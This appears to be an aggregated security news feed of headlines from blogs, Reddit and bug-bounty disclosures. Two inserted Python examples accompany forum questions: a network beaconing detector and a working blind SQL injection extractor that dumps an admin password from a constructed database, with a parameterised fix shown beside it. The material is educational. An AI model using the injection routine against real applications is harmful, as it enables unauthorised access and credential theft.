    XSS vulnerability
    Hi amigos, today we are going to discuss the XSS vulnerability, also known as the Cross-Site Scripting vulnerability, which is regarded… Continue reading on Medium »
    How to Use Nmap for Port and Network Scanning
    Network and port scanning is like going around a house and observing which doors and windows are open and who is standing at them. Continue reading on Medium »
    P1 Bug Hunting — FTP Server Broken Access Control
    TL;DR- A bug hunting walkthrough on a critical-level FTP vulnerability that was alarmingly simple to find and validate. Continue reading on The Gray Area »
  • Open

    Getting into evasion
    I want to shift more towards evasion. I'm lowkey familiar with the theory around unhooking, direct/indirect system calls etc., but don't know which technique to focus on to get started. From what I understand direct system calls are not relevant anymore on newer versions of Windows, and for unhooking, the calls needed to unhook might be hooked? Some enlightenment here would be amazing, thanks! submitted by /u/MickeyDB01 [link] [comments]
  • Open

    SecWiki News 2023-01-26 Review
    A webshell detection engine bypass test, by ourren. For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Morning Report | E-mail addresses of multiple Japanese central government ministries leaked; Hive ransomware seized
    An international law-enforcement operation made up of the US Department of Justice, the FBI, the Secret Service, Europol, and Germany's BKA and Polizei seized the Hive ransomware data-leak site.
  • Open

    Advisory: XSS Vulnerability for Arbitrary Domains in Skyhigh Security's Secure Web Gateway
    submitted by /u/RedTeamPentesting [link] [comments]
    Yandex Services Source Code Leaked
    submitted by /u/pipewire [link] [comments]
    Exploiting a Critical Spoofing Vulnerability in Windows CryptoAPI
    submitted by /u/Gallus [link] [comments]
    Ransacking your password reset tokens
    submitted by /u/mckirk_ [link] [comments]
    Digital False Flag Operations: A How-To Guide. Pinning your malicious digital operations to the opposition
    submitted by /u/Robbedoes_ [link] [comments]
    Whacking a phishing admin panel for fun and profit
    submitted by /u/thehunter699 [link] [comments]
  • Open

    Github Apps can use Scoped-User-To-Server Tokens to Obtain Full Access to User's Projects in Project V2 GraphQL api
    GitHub disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1711938 - Bounty: $20000
  • Open

    Chinese PlugX Malware Hidden in Your USB Devices?
    PlugX remains an active threat. A newly discovered variant infects USB devices and a similar variant makes copies of PDF and Microsoft Word files. The post Chinese PlugX Malware Hidden in Your USB Devices? appeared first on Unit 42.
  • Open

    The colours of the teams and what they mean: RED TEAM
    tarponise Continue reading on Medium »
    Weaponizing LNK files with CMD
    One of the main problems with Red Team engagements is gaining initial access to the target organisation if no exploitable vulnerabilities… Continue reading on Medium »
    Tryhackme — Gallery
    Hi everyone, it has been a long time since I updated this blog. So in this post I will share a writeup of a TryHackMe machine… Continue reading on Medium »
  • Open

    Some random installs and backups
    http://193.93.60.30/ submitted by /u/deadjdona [link] [comments]

  • Open

    Microsoft Defender Best Security Policies & Practices To Adopt?
    Hi, in my current company we use conditional access policies for AD. I was wondering what Microsoft Defender for Cloud Apps, Microsoft Security and Microsoft AD functions, policies and practices there are to adopt. Like, what does your company currently utilise? We are a Microsoft house and I am always very keen to get my hands dirty and implement new countermeasures. Thanks again submitted by /u/moneyzaa [link] [comments]
    SANS Aptitude Test
    Hello! Does anybody have any info about the aptitude test, types of questions, score needed to pass.. etc submitted by /u/Bojangles_BBN [link] [comments]
    Unusual traffic times, encrypted over port 80 to VPS
    We've found an Android device in our guest wireless zone that's regularly connecting over port 80 to a VPS in Canada (I'm in the USA) early in the morning or very late at night. So far I haven't been able to correlate it to a custodian based on entrance times. The data transmitted is usually less than 20k, though occasionally a larger chunk between 500-600k. I'm not terribly concerned about it since that network is tightly isolated, but it looks like something beaconing out and I'm very curious to get to the bottom of it before I just outright block it. I only have a few packets to analyze and I can't see much since the data is scrambled. submitted by /u/EnterNam0 [link] [comments]
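One way to put a number on the "looks like beaconing" hunch is to measure how regular the connection timing is. The following is an added example, not part of the post above: it groups flow records by (source, destination, port), computes the median interval between connections and the relative jitter around it, and flags pairs whose timing is too regular for a human. The flow records are constructed for the example (documentation address ranges, made-up sizes), and the thresholds (minimum six connections, jitter of at most 5%) are assumptions to tune against your own traffic.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_flows():
    """Constructed flow records (timestamp, src, dst, dport, bytes); not real data."""
    base = datetime(2023, 1, 26, 1, 0, 0)  # early morning, as in the post
    flows = []
    # A beacon: roughly every 10 minutes with a few seconds of jitter, ~1.5 KB
    # per check-in, plus one larger upload in the middle of the series.
    for i in range(12):
        ts = base + timedelta(seconds=600 * i + (i % 3) * 2)
        size = 560_000 if i == 7 else 1500 + 40 * i
        flows.append((ts, "10.20.0.55", "203.0.113.10", 80, size))
    # Ordinary browsing from another guest device: irregular gaps, larger pages.
    t = base
    for gap in (5, 130, 12, 900, 3, 44, 2200, 8):
        t += timedelta(seconds=gap)
        flows.append((t, "10.20.0.71", "198.51.100.23", 443, 20_000 + gap * 7))
    return flows


def beacon_scores(flows, min_connections=6):
    """Per (src, dst, dport): connection count, median interval and relative jitter.

    Jitter is the median absolute deviation of the inter-connection gaps divided
    by the median gap, so a perfectly periodic beacon scores 0.0 while a human
    browsing session scores close to 1.0 or above.
    """
    groups = defaultdict(list)
    for ts, src, dst, dport, size in flows:
        groups[(src, dst, dport)].append((ts, size))

    scores = {}
    for key, events in groups.items():
        if len(events) < min_connections:
            continue  # too few connections to say anything about periodicity
        events.sort()
        times = [ts for ts, _ in events]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median_gap = statistics.median(gaps)
        mad = statistics.median(abs(g - median_gap) for g in gaps)
        sizes = [size for _, size in events]
        scores[key] = {
            "count": len(events),
            "median_interval_s": median_gap,
            "jitter": mad / median_gap if median_gap else float("inf"),
            "median_bytes": statistics.median(sizes),
            "max_bytes": max(sizes),
        }
    return scores


def flag_beacons(scores, max_jitter=0.05):
    """Return the (src, dst, dport) keys whose timing is regular enough to look like a beacon."""
    return sorted(key for key, s in scores.items() if s["jitter"] <= max_jitter)


if __name__ == "__main__":
    scores = beacon_scores(build_sample_flows())
    for key in flag_beacons(scores):
        s = scores[key]
        print(f"{key[0]} -> {key[1]}:{key[2]} every ~{s['median_interval_s']:.0f}s, "
              f"{s['count']} connections, median {s['median_bytes']:.0f} B, max {s['max_bytes']} B")
```

The median/MAD pair is used instead of mean/standard deviation so that one missed check-in or one long upload (the occasional 500-600k chunk in the post shows up in max_bytes rather than distorting the interval) does not hide the periodicity. Regular timing alone is also what OS update checks, NTP and MDM agents look like, so the flagged pairs are a hunting list to cross-check against the destination and the expected behaviour of the device, not an alert on their own.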
    How to properly identify attacker (RAT, Uefi Rootkit, Hidden IoT Device, Rubberducky) and Log / track it
    A client of mine is infected with some kind of remote access/control VNC software, probably a RAT for Windows 10. Firewalls and antivirus software do not find anything. Manually checking autostarts, the scheduler, services and so on did not bring up any suspicious process (I am not an infosec professional, just an administrator). So this guy actually made fun of me and chatted with me inside a text file, and disrupts my and the employees' work by clicking and opening programs, installing games and doing a lot of hoaxes. I tried to capture open ports and IP addresses via netstat, but of course every time I do some research he just closes my remote support application. I am not sure if forensics could find anything when I unplug this computer from the Internet; probably there are some automatic cleanup/rename tasks. What would be the proper way to react? We closed all outgoing ports of the firewall and whitelisted the essential ports. Problem port: 443. How can I secure HTTPS? I found an old OpenSSH installation and I am not sure if the attacker encrypts his RAT/VNC/SSH actions via PuTTY (for example) and hides its traffic in HTTPS traffic. Geoblocking is active, still useless if he is behind a VPN or proxy cascade. Making things more complicated, he shared some information within our chat which indicates (proves) that he or she is an employee in the same company. He even explained why he is manipulating this exact workstation and co-workers. Best regards, Civil submitted by /u/IndependenceCivil175 [link] [comments]
    educating customers on phishing
    At our company we're looking at adding and sharing information, including images, of what our official communications look like, so customers can spot real letters/emails/texts from us versus fake ones. Similar to these companies https://www.royalmail.com/help/scam-examples https://www.britishgas.co.uk/help-and-support/my-account/if-you-get-a-suspicious-email Has anyone got experience of this in their company, or want to share advice on what to avoid or recommendations, so we help our customers without helping criminals? A fine line to balance! submitted by /u/TWateride [link] [comments]
    Scripts for Blind SQLi? (for OSCP)
    Hello, folks! I am preparing for the OSCP, currently going through TJNull's list. Today I was solving Healthcare-1 from VulnHub. It has OpenEMR v4.1.0 (sorry for the spoiler), which has an SQLi exploit: https://www.exploit-db.com/exploits/49742 I have 3 options: SQLMap (not allowed in the exam); do it manually (ahh, blind SQLi will take forever); use available scripts as mentioned above. My question: can we use these kinds of scripts on the exam? PS: Asking this here because I could not post on r/OSCP (it shows the post is removed; my karma is low) and don't know where I should ask this. Yeah, I'm new to Reddit. submitted by /u/doubleo10 [link] [comments]
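To show what such a blind-SQLi script actually does, here is an added example that is neither from the post above nor from the exploit it links: a boolean-based blind extraction routine in Python, run against a deliberately injectable lookup backed by an in-memory SQLite database constructed for the example, with the parameterised version of the same lookup next to it. The table, column and credential values are made up. The technique (binary search over LENGTH() and over the code point of each SUBSTR() character, so each character costs about seven requests instead of up to 128) is the general one; the function names change per database.

```python
import sqlite3


class VulnerableApp:
    """Constructed stand-in for a user lookup that concatenates input into SQL."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
        self.conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t!')")
        self.queries = 0  # counts how many requests the attacker had to send

    def user_exists(self, username):
        # Injectable: the input lands inside the quotes unescaped.
        sql = f"SELECT 1 FROM users WHERE username = '{username}'"
        self.queries += 1
        try:
            return self.conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False  # errors are hidden, so only true/false leaks out

    def user_exists_safe(self, username):
        # Hardened form: a bound parameter cannot change the shape of the query.
        self.queries += 1
        row = self.conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
        return row is not None


def make_oracle(app, check=None):
    """Wrap the app as a yes/no oracle for an arbitrary SQL condition."""
    check = check or app.user_exists

    def oracle(condition):
        # 'admin' exists, so the lookup is true exactly when `condition` is true.
        return check(f"admin' AND ({condition}) -- ")

    return oracle


def blind_int(oracle, expr, lo, hi):
    """Binary-search the integer value of `expr`, known to lie in [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(oracle, subquery, max_len=64):
    """Recover the string returned by `subquery` one character at a time."""
    length = blind_int(oracle, f"LENGTH(({subquery}))", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # UNICODE()/SUBSTR() are SQLite; use ASCII()/SUBSTRING() on MySQL or MSSQL.
        code = blind_int(oracle, f"UNICODE(SUBSTR(({subquery}), {pos}, 1))", 0, 127)
        chars.append(chr(code))
    return "".join(chars)


ADMIN_PASSWORD_SUBQUERY = "SELECT password FROM users WHERE username = 'admin'"


def dump_admin_password(app):
    """Extract the admin password through the injectable lookup; returns (value, requests)."""
    before = app.queries
    secret = blind_string(make_oracle(app), ADMIN_PASSWORD_SUBQUERY)
    return secret, app.queries - before


if __name__ == "__main__":
    app = VulnerableApp()
    secret, requests = dump_admin_password(app)
    print(f"recovered {secret!r} in {requests} requests")
    # Against the parameterised lookup the same payload is just a user that does not exist.
    print("safe lookup leaks:", make_oracle(app, app.user_exists_safe)("1=1"))
```

The 64-character upper bound on the length and the ASCII-only character range are assumptions that keep the example short; widen them (or search the code point in a larger range) for real targets. The same `oracle` interface is what a time-based variant replaces: instead of reading true/false from the response, the condition is wrapped in a sleep and the oracle returns whether the response took longer than a threshold, with everything else unchanged.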
  • Open

    Unrestricted File Upload
    Bypass Filter: Continue reading on Medium »
    Dexalot HackenProof Bug Bounty
    Dexalot is a non-custodial, decentralized cryptocurrency exchange with a Central Limit Order Book capability. Through Avalanche… Continue reading on Dexalot »
    0xbaDc0dE MEV Bot Hack Analysis
    Introduction Continue reading on Immunefi »
    Exploiting CVE-2022-21500
    Hello everyone, this is my first article here on Medium. In this first article, I will tell how I managed to find and exploit a… Continue reading on Medium »
    Top 10 bugs found in C++ projects in 2022
    According to tradition, it’s time to recall 10 of the most interesting warnings that PVS-Studio found during 2022. Continue reading on PVS-Studio »
    Easy $2000 Race Condition
    In this post, I will show you how a race condition can be critical. Continue reading on Medium »
    Story of Stored HTML Injection
    Whoami: Althaf Continue reading on Medium »
    Learning Web-Sec - Day 14 - Authentication Vulnerabilities
    Multiple Credentials Per Request - PortSwigger Lab Walkthrough Continue reading on System Weakness »
    How Black Hat Hackers Hack Anyone With Just an SMS
    Beware of these kinds of messages. Of course, it won't affect iPhone users. But I tried checking out the link; it basically downloads an… Continue reading on Medium »
  • Open

    Geolocating Protesters In Yemen
    TOPICS Continue reading on The Sleuth Sheet »
  • Open

    PyCript is a Burp Suite extension to bypass client-side encryption that supports both manual and automated testing such as Scanners, Intruder, or SQLMAP. Custom encryption logic can be written in NodeJS to support any encryption within BurpSuite
    submitted by /u/Ano_F [link] [comments]
    DMARC Identifier Alignment: relax, don't do it, when you want to go to it - From subdomain takeover to phishing mails
    submitted by /u/ljulolsen [link] [comments]
    Active Directory: Using LDAP Queries for Stealthy Enumeration
    submitted by /u/andreashappe [link] [comments]
    Exploiting Hardcoded Keys to achieve RCE in Yellowfin BI
    submitted by /u/Mempodipper [link] [comments]

    SecWiki News 2023-01-25 Review
    Fiora: a graphical version of the vulnerability PoC framework Nuclei by 路人甲; ELF backdoor generation tool for various architectures by 路人甲; DARPA's Explainable Artificial Intelligence program by ourren. For more of the latest articles, visit SecWiki

    Hack What You Have (Part 4): H3C Smart Camera
    This is the fourth installment of the "Hack What You Have" series; the subject is the H3C TC2100 smart camera (pan-tilt), with a focus on traffic capture and protocol analysis.

    At the Edge of Tier Zero: The Curious Case of the RODC
    Continue reading on Posts By SpecterOps Team Members »
    Attacking DevOps ecosystems with Epyon
    Epyon is a swiss army knife tool for pentesting DevOps ecosystems. It has multiple modules for performing actions in common DevOps systems. Continue reading on Morphus Labs »
    DLL Sideloading. An offensive perspective.
    Part One. Continue reading on Red Squadron »
    5 Best C2 Framework for Red Teaming
    The red team is regarded as the aggressive part of the security apparatus. Continue reading on TheSecMaster »
    VulnHub’s Vegeta: 1
    Vegeta is one of the vulnerable boxes on VulnHub. VulnHub advertises “This box is an easy box for the complete beginner.” Vegeta is what I… Continue reading on Medium »

    Java and .NET Vulnerabilities Persist Longer than JavaSc
    Research shows that Java and .Net vulnerabilities occur more often and are left un-fixed more frequently than languages like Javascript… Continue reading on System Weakness »

    Ptrace Injection CTF Challenge Walkthrough
    submitted by /u/ragnarsecurity [link] [comments]

    With the influx of posts asking about DFIR and career advice, I made a survey.
    I made a survey to get a feel for the DFIR industry and salaries. You can fill it out here. I want to try to get an idea of salary ranges and backgrounds of people in the field. This may work out, it may not, but I made a Google form if you can just fill it out. The questions (if anyone has a question they think I should add, let me know): Education background; How many years have you been in the DFIR field; Do you hold any certifications from the following vendors; Are you currently happy with your current job; Would you consider yourself overworked or burnt out; What is your current salary; What is your job role (select all that apply); Role level; Do you feel underpaid; How many times have you swapped jobs/companies; Are you Law Enforcement or Private Sector; What advice would you have for recent graduates or newcomers to the DFIR community. I'll be closing this out Feb 1st and then supply the results. submitted by /u/MDCDF [link] [comments]

    k8s Enforcing Resource Usage Limits with cgroups (capacity enforcement): Model Design and Code Implementation (2023)
    1 Introduction 2 k8s resource model 2.1 Node resource abstraction 2.1.1 Capacity 2.1.2 Allocatable 2.1.3 Allocated 2.2 Node resource partitioning (reservation) 2.2.1 SystemReserved 2.2.2 KubeReserved 2.2.3 EvictionThreshold 2.2.4 Allocatable 2.3 Related kubelet configuration parameters 3 k8s cgroup hierarchy design 3.1 cgroup basics 3.2 kubelet cgroup runtime driver 3.3 kubelet cgroup hierarchy 3.1.1 Container-level cgroup 3.1.2 Pod-level cgroup 3.1.3 QoS-level cgroup 3.1.4 Node-level cgroup 3.3 cgroup (v1) configuration directories 3.3.1 kubelet cgroup root 3.3.2 /kubepods (node-level configuration) 3.3.3 QoS-level configuration 3.3.4 Pod-level configuration 3.3.5 Container-level configuration 4. Discussion 4.1 Mapping requests/limits to specific cgroup configuration files 4.1.1 CPU 4.1.2 Memory 4.1.3 Other 4.2 Relationship between requests/limits and scheduling 4.2.1 Scheduling based on requests 4.2.2 Enforcement based on limits 4.3 How kubelet computes pod requests/limits 4.4 Consequences of resource usage exceeding limits 4.5 When node resources are under pressure, by …


    Takeover — TryHackMe Simple Writeup | 2023
    TryHackMe’s Takeover Simple Walkthrough | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Exploring Network Security with Nmap Commands: Ethical Hackers (Beginners) Must Know
    I’ve already discussed the legion tool. It is a tool for scanning targets via a graphical user interface. View it now Continue reading on Medium »
    Penetrating firewalls and discovering secrets Concepts — The Nmap Ninja
    Nmap, which stands for Network Mapper, is a free and open source programme used for port scanning, vulnerability analysis, and, obviously… Continue reading on Medium »
    Simple SQL Injection Vulnerability in WHERE clause allowing retrieval of hidden data | 2023
    Portswigger Lab Simple Solution — SQL Injection | Karthikeyan Nagaraj Continue reading on Medium »
    Explaining vulnerabilities : IDORs {Bug bounties}
    What are IDORs? Continue reading on Medium »
    Bypassing a Creation Limit on Free Accounts: A Race Condition Vulnerability in Bug Bounty Program
    The following vulnerability was reported in a self-hosted bug bounty program. The program reported that it was a duplicate. I find it… Continue reading on Medium »

    Inspecting http traffic from mobile phone applications
    Hi all, I would like to learn a little bit about network communication from mobile device applications (so probably HTTP/S calls to remote application APIs). What are the possibilities to intercept a mobile device with some network tracing tool that captures remote network calls? I'm not sure if something like this exists directly as a mobile application, but I mean something like Burp Suite, where I can point my mobile phone at it and capture all exchanged traffic. For testing I would use my old rooted OnePlus One mobile. Does anyone have experience with a similar setup? submitted by /u/woky_s [link] [comments]
    How to combat repeat brute force attempts in your company?
    Hi. We are utilising hybrid cloud in our company, so we are using Azure AD with on-prem AD sync. Recently, I noticed a lot of repeat brute force attempts on a few of our users. I was wondering what measures I could implement within Azure AD. What do you do in your company? Should I put an account lockout in place, or implement a timer which locks the account temporarily and makes the user call IT? submitted by /u/moneyzaa [link] [comments]
    Best software or tool to present phishing campaign data
    Just wondering what you guys use to make a report of data from phishing campaigns or any other data. I tried Power BI, but my manager didn’t like it. I just want a nice visual with charts and bars so it looks good when presenting. Any thoughts? submitted by /u/Puzzleheaded-Try5749 [link] [comments]
    Identifying unknown 2FA SMS messages?
    Hi /r/netsec! Over the last month or so, I've received a handful of SMS messages that seem to be 2FA-related, and that I don't recognize (and didn't request myself). I'm wondering whether I should be worried, and if so how I should best proceed. The SMS messages are from the number 59872 and are formatted as follows: ALERT! DO NOT share this code with anyone. We will never ask you for this code. Verification Code: XXXXXX (expires in 3 minutes) (X's represent the redacted code.) Around the same time as one of these messages, I also received one phone call (not answered) from +1 (714) 707-3260 with caller ID "Verify", along with a voice message that just says 4 digits and then "Goodbye". I can think of a few possibilities for what's going on: Someone has my password for some serv…

    No iMessages in iCloud Backups - Solution
    Just posting it here because I have had other experts asking about it. There is a thing called iMessage Cloud sync where Apple will not include iMessages in backups but "sync" the data in the cloud. If you use a tool like Elcomsoft PPB to download the backup, you won't get the messages. You can download the messages using the "Download Sync'd data" function, but it is a pain in the ass to work with and parse. The counter-intuitive solution is to have the user go on the phone (assuming that you don't have direct access to the phone, which is why you are doing iCloud in the first place, and need to have the user do it) and go to iCloud settings; there is a slider bar for messages and you need to turn it off. Yes, it seems weird, but you need to turn off messages. You will then get a warning that says your messages will no longer be stored in the cloud. Wait overnight for the phone to do a regular backup, and the messages and attachments should all be there. I did one this week that was 4 GB before turning messages off and 30 GB after. The second iCloud download had all the stuff I was looking for. TLDR: Before you download an iCloud as an alternative to copying a phone directly, make sure the slider for iMessages is OFF in the settings; it is counter-intuitive, but Apple won't back up the messages to iCloud unless that is off. It may be that you have them check, and if it is on, cut it off and call them back the next day. Let me know if anyone has any questions. submitted by /u/ellingtond [link] [comments]
    FTK Imager Lite still around?
    So I'm being asked to use FTK Imager Lite to search for some data on our share, but I'm not able to find a "free" download for it that doesn't seem sketchy. Is it still a free product? Anyone have a good link? submitted by /u/SomeWhereInSC [link] [comments]
    Synchronization iPhone
    Hi all, where on an iPhone (an iPhone 5, to be exact) is it stored what the phone syncs with and what exactly is synced? Thanks in advance. submitted by /u/AartdB [link] [comments]
    Questions about printer steganography
    Hi, I read an article mentioning printer steganography, and read more articles/pages about this: https://en.wikipedia.org/wiki/Machine_Identification_Code https://www.bbc.com/future/article/20170607-why-printers-add-secret-tracking-dots https://blog.erratasec.com/2017/06/how-intercept-outed-reality-winner.html#.Y8-t4oTP3QF https://www.eff.org/pages/list-printers-which-do-or-do-not-display-tracking-dots Now it seems that this was primarily done to tackle counterfeit currency problems, and only in colored laser printers. Here are my two questions: As per the last link above, all the printers in that list (which is not being updated anymore) are colored laser printers. Were they not doing this in inkjet printers? Black-and-white laser and inkjet printers cannot be used to print currency, for obvious reasons. But are they leaving identifiers like this https://upload.wikimedia.org/wikipedia/commons/7/73/Machine_Identification_Code.png on black-and-white prints printed via black-and-white laser and inkjet printers? If yes, then how to identify them? I don't have access to blue/UV light, so I cannot check and confirm. Thanks. submitted by /u/becool773 [link] [comments]

    Bypassing Cloudflare WAF: XSS via SQL Injection
    submitted by /u/plsaskmecom [link] [comments]
    GitHub - Free Python scanner for CVE-2022-47966
    submitted by /u/vonahisec [link] [comments]
    Operator’s Guide to the Meterpreter BOFLoader
    submitted by /u/n00py [link] [comments]
    CVE-2023-0210 – Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBD
    submitted by /u/MiguelHzBz [link] [comments]
    Gato (Github Attack TOolkit), a tool to enumerate, attack, and defend GitHub Actions self-hosted runners
    submitted by /u/exploding_nun [link] [comments]
    A website to get latest security advisories from multiple sources
    submitted by /u/karimhabush [link] [comments]
    Tampering User Attributes In AWS Cognito User Pools
    submitted by /u/nibblesec [link] [comments]
    Reverse-engineering the conditional jump circuitry in the 8086 processor
    submitted by /u/Gallus [link] [comments]
    Bitwarden design flaw: Server side iterations
    submitted by /u/Gallus [link] [comments]

    Detecting malicious artifacts using an ETW consumer in kernel mode
    submitted by /u/dmchell [link] [comments]
    Upcoming malware that’s not too well known yet but you feel may be a threat?
    As the title says, I’m interested to hear your findings/thoughts! Doing research. submitted by /u/Cyberkitty08 [link] [comments]

    SecWiki News 2023-01-24 Review
    SecWiki Weekly (Issue 464) by ourren; CVE-2022-41080_41082 Microsoft Exchange Server OWASSRF remote code execution vulnerability analysis by ourren; Automated extraction of shellcode from malicious documents by ourren. For more of the latest articles, visit SecWiki

    Rust Vulnerability Analysis and Maturity Challenges
    Article URL: https://insights.sei.cmu.edu/blog/rust-vulnerability-analysis-and-maturity-challenges/ Comments URL: https://news.ycombinator.com/item?id=34505093 Points: 2 # Comments: 0

    CVE-2023-0210 – Linux Kernel Unauthenticated Remote Heap Overflow Within Ksmbd
    Article URL: https://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow/ Comments URL: https://news.ycombinator.com/item?id=34504964 Points: 6 # Comments: 0
    Pkgconf, CVE-2023-24056 and disinformation
    Article URL: https://ariadne.space/2023/01/24/pkgconf-cve-2023-24056-and-disinformation/ Comments URL: https://news.ycombinator.com/item?id=34503115 Points: 5 # Comments: 0

    Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats
    We observed a recent spate of supply chain attacks attempting to exploit CVE-2021-35394, affecting IoT devices with chipsets made by Realtek. The post Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats appeared first on Unit 42.

    Operator’s Guide to the Meterpreter BOFLoader
    1.1 Introduction Recently, a few friends and I decided to port my coworker Kevin Haubris‘ COFFLoader project to Metasploit. This new BOFLoader extension allows Beacon Object Files (BOFs) to be used from a Meterpreter session. This addition unlocks many new possibilities for Meterpreter and, in my opinion, elevates Meterpreter back up to the status of... The post Operator’s Guide to the Meterpreter BOFLoader appeared first on TrustedSec.

    Casino Download X
    When you go online to find new games, there is no shortage of results, quite the opposite. There are so many sites and games that it can… Continue reading on Medium »

    Using special IPv4-mapped IPv6 addresses to bypass local IP ban
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1785260 - Bounty: $7500

    ChatGPT + Python to Automate Fuzz Testing Setup
    I used ChatGPT to write a Python script to help automate the setup for copying code from GitHub and setting up the fuzzer CI Fuzz CLI. Continue reading on Medium »

    Review: EliteGhost CTF 2023
    This is review for OSINT challenges in EG CTF 2023 Continue reading on Medium »

    Basic SSTI — Server-Side Template Injection | 2023
    No content preview
    Clipboard Hijacking
    What it is, how to do it, and how to prevent it Continue reading on InfoSec Write-ups »
    Malware Alert: Recognizing the Tell-Tale Signs of an Infection
    No content preview
    I tried to squeeze the best from the most bizarre CVE I have ever seen (CVE-2021–38759)
    No content preview
    Signal Client v6.2 and earlier versions vulnerable to CVE-2023–24068 & CVE-2023–24069
    No content preview

    Firmwares for random stuff
    submitted by /u/themariocrafter [link] [comments]
    Cats are cute: CPU/MEM infos, 2 APKs, screenshots, discord logs
    submitted by /u/themariocrafter [link] [comments]
    Tons of French D1sney Movies on a fast NL Seedbox
    submitted by /u/mingaminga [link] [comments]


    Utilizing Obsidian in Malware
    submitted by /u/CosmodiumCS [link] [comments]
    Tips to stay safe while working with malware samples.
    Use a different OS on the host machine than your analysis VM --> most malware will not be able to run there. Use a different machine for malware analysis (even if analysis happens in a VM) than for your other work or private stuff. Make sure the analysis machine is not connected to the company network or your personal network. If you transfer files via USB flash drives, mark malware USB flash drives, e.g. red ones mean they are used to carry samples. Be aware that those flash drives will become infected by worms. If you transfer malware files via a shared folder, make the folder readable only for the analysis VM. Be aware that writeable folders will become infected by worms or viruses, or encrypted by ransomware. On Windows, use ACLs to prevent execution. This will not prevent A…

    Mastodon server for hacking community
    submitted by /u/n4bb [link] [comments]
    Pwning the all Google phone with a non-Google bug | The GitHub Blog
    submitted by /u/smaury [link] [comments]
    A step-by-step introduction to the use of ROP gadgets to bypass DEP
    submitted by /u/CyberMasterV [link] [comments]
    NSA CSI IPv6 Security Guidance
    submitted by /u/sanitybit [link] [comments]
    OSINT Search Engine | Cylect.io
    submitted by /u/brekfasbaksetz [link] [comments]

    [song.link] Open Redirect
    Linktree disclosed a bug submitted by 0xshdax: https://hackerone.com/reports/1699025 - Bounty: $400
    XSS on link and window.opener
    Slack disclosed a bug submitted by pisarenko: https://hackerone.com/reports/834071 - Bounty: $1000

    Documents and media from iCloud device backup parsed in Cellebrite missing date/time metadata
    Recently, I've observed missing file system date/time metadata for local media and documents from iCloud device backups parsed in up-to-date Cellebrite PA. Has anyone else experienced this? If so, any proposed remedies? The iCloud device backups are pulled using the latest release of Elcomsoft PB. Internal metadata is fine, as expected. It's the external dates and times recorded by the iPhone file system that I'm not seeing anymore. submitted by /u/zero-skill-samus [link] [comments]
    Interview tips for upcoming interview with the NY district attorney
    I’m having an interview with the Bronx DA for a digital forensics examiner role. I only have around 2 years of experience, mostly dealing with cyber security incidents and malware analysis; however, I’m very familiar with mobile forensics and computer forensics in criminal cases. Any tips on how to stand out and succeed? submitted by /u/Lightyagami228 [link] [comments]
    EZ Tools Manuals Interview with Andrew Rathbun
    A new 13Cubed Interview is now publicly available! In this video, I talk with Andrew Rathbun about the EZ Tools Manuals he's written, as well as other DFIR community projects! https://www.youtube.com/watch?v=Mz5hin8Wxak submitted by /u/13Cubed [link] [comments]
    Glide and VolleyCache Forensics
    I'm looking at the results of an Android acquisition. Images were carved out of the VolleyCache subfolder for the YouTube application. The files that exist in the volleycache folder typically end in .0. From what I've read, this is the raw image from the YouTube server. My question is, the dates and times that appear in that raw image do not correspond to the MAC dates of the .0 file. There are two dates within that .0 image. The first date appears under Access-control-allow-origin, and the second date under "Expires". I'm more concerned with the first date (under access-control-allow-origin) than the "expires" date. What does that date reflect? Is this the date/time of the image as it exists on the YouTube server? https://preview.redd.it/b9i2wcmsjsda1.jpg?width=337&format=pjpg&auto=webp&s=30be83ac494d458f28c1f2608f601e7577fab872 submitted by /u/IndividualHedgehog19 [link] [comments]

    #1 The Monday Hunt—IDOR-able escapade
    For those who are not familiar, an IDOR, or Insecure Direct Object Reference, is like a secret door in a website that should be locked… Continue reading on Medium »
    From Failure to Success: My Experience with the HTB CBBH
    Hello everyone, my name is Hac and in this post, I will be sharing my experience with the HTB CBBH exam, which is a practical web… Continue reading on InfoSec Write-ups »
    Why Companies Should Adopt a Bug Bounty Program
    In the world of cybersecurity, one of the most effective strategies for catching potential breaches is a bug bounty program. A bug bounty… Continue reading on Medium »
    A Python script that scrapes for my passwords and secrets on GitHub.
    Today I am showing you how you can make your own GitHub scraper in Python. Continue reading on Medium »
    Understanding the XSS Threat: A Comprehensive Guide to DOM Based Cross Site Scripting Vulnerability
    Cross-site scripting (XSS) has become one of the most common security vulnerabilities and a major threat to online security. It is a type… Continue reading on Medium »
    How I Hacked Scopely using “Sign in with Google”
    How I accessed any account by having the victim visit a malicious link, and hacked their Gmail accounts by abusing “Sign in with Google”. Continue reading on Medium »
    CAPTCHA
    What is CAPTCHA? Continue reading on Medium »
    Finding More IDORs – Tips And Tricks ($100/Day)
    Technical Tips Continue reading on Medium »

    Broken Object Level Authorization [API SECURITY — 0x1]
    No content preview
    From Failure to Success: My Experience with the HTB CBBH
    No content preview
    Breaking into Cybersecurity as a Developer
    I just finished my first year working as security engineer and wanted to give a recap of all the things I did to get into my current role… Continue reading on InfoSec Write-ups »
    Decrypting HTTPS Traffic as A Hacker
    No content preview

    CVE-2021-21551 - Privilege escalation exploit for physical memory read/write vulnerability
    https://github.com/nanabingies/CVE-2021-21551 submitted by /u/nanabingies [link] [comments]

    Chronolocation and geolocation — solution to Quiztime OSINT challenge 28/11/2022
    Chronolocation and geolocation used to solve a Quiztime OSINT challenge Continue reading on Medium »
    Defending Against Web Scraping Attacks
    Attackers can use web scraping to launch attacks on an organization. Continue reading on Medium »

    Vaporwave music
